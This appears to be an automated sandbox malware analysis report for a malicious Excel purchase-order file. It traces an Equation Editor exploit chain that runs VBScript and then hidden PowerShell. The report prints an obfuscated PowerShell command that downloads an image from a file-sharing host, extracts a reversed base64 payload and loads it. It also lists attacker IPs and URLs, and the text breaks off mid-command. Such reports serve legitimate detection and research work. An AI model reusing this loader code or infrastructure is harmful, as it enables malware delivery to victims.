    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49170
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49170
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49170
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443

    Networking

    Source: Network traffic | Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49174 -> 23.95.128.215:80
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_035705DC URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035705DC
    Source: global traffic | HTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
    Source: Joe Sandbox View | IP Address: 193.30.119.205
    Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
    Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
    Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: global traffic | HTTP traffic detected: GET /mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.128.215Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.128.215Connection: Keep-Alive
    Source: unknown | HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49168 version: TLS 1.0
    Source: unknown | HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49169 version: TLS 1.0
    Source: unknown | HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49170 version: TLS 1.0
    Source: unknown | HTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49175 version: TLS 1.0
    Source: unknown | TCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\821C5575.emf
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: global traffic | DNS traffic detected: DNS query: ljg.cl
    Source: global traffic | DNS traffic detected: DNS query: 3105.filemail.com
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 27 Nov 2024 16:56:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 27 Nov 2024 16:56:18 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
    Source: EQNEDT32.EXE, 00000009.00000002.456656505.000000000057F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF
    Source: EQNEDT32.EXE, 00000009.00000002.456656505.000000000057F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF?
    Source: EQNEDT32.EXE, 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIFj
    Source: powershell.exe, 0000000D.00000002.472460335.0000000005012000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: powershell.exe, 0000000D.00000002.472460335.0000000005012000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: powershell.exe, 0000000D.00000002.471392095.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
    Source: powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
    Source: powershell.exe, 0000000B.00000002.473369989.0000000002638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.471392095.00000000025E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: powershell.exe, 0000000D.00000002.471392095.0000000002999000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://3105.fil
    Source: powershell.exe, 0000000D.00000002.471392095.0000000002719000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://3105.filemail.com
    Source: powershell.exe, 0000000D.00000002.471392095.0000000002719000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
    Source: powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: ljg.cl.url.3.dr | String found in binary or memory: https://ljg.cl/
    Source: Pedido No 4500924462.xls, 8A830000.0.dr, ~DF5A3DDFB1D8F2532B.TMP.0.dr | String found in binary or memory: https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange
    Source: powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49175
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
    Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49175 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
    Source: unknown | HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49167 version: TLS 1.2

    System Summary

    Source: Process Memory Space: powershell.exe PID: 3924, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc, type: DROPPED | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc, type: DROPPED | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
    Source: Pedido No 4500924462.xls | OLE: Microsoft Excel 2007+
    Source: 8A830000.0.dr | OLE: Microsoft Excel 2007+
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ljg.cl.url
    Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
    Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 770B0000 page execute and read and write
    Source: Pedido No 4500924462.xls | OLE indicator, VBA macros: true
    Source: Pedido No 4500924462.xls | Stream path 'MBD0006D5BA/\x1Ole' : https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&sliceqSO Z96VaPQ@I026S<M6Ap1ZPBoiv6Ktf0rVQvWqdAG9kDz8sKW9DU58iFm0c2B0WEhemuGidA3Q0eXT4KdfYRv3TQGviBsMCykuXeVAfQIdh4RdQfv3yJ5gvcrBCupNnvu01UdpmhczxrOuNXv0Qrqu8XFNMe209dLl6nfyyWnfLj+<@7YYHXil%
    Source: ~WRF{498AB1A3-A070-4AC4-B443-2EA9C1DC4C55}.tmp.3.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 2446
    Source: Process Memory Space: powershell.exe PID: 3924, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
    Source: classification engine | Classification label: mal100.expl.evad.winXLS@9/28@10/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\8A830000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR7E62.tmp
    Source: Pedido No 4500924462.xls | OLE indicator, Workbook stream: true
    Source: 8A830000.0.dr | OLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................U.n.a.b.l.e. .t.o. .f.i.n.d. .t.y.p.e. .[.d.n.l.i.b...I.O...H.o.m.e.]...................H.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.3.8.............................m.e.]...................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............$.......................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............0.......................m.e.]...........................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............B.......................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............N.......................m.e.]...........................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............`.......................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............l.......................m.e.]...........................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .u.n.t.i.m.e.E.x.c.e.p.t.i.o.n.....~.......................m.e.]...................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...................T.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...........................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d.......................................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d.......................................m.e.]...........................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s....................j.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.7.1................................s....................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..............."..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............@..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............L..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............^..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............j..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............|..........................s....................`.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Pedido No 4500924462.xlsReversingLabs: Detection: 23%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = 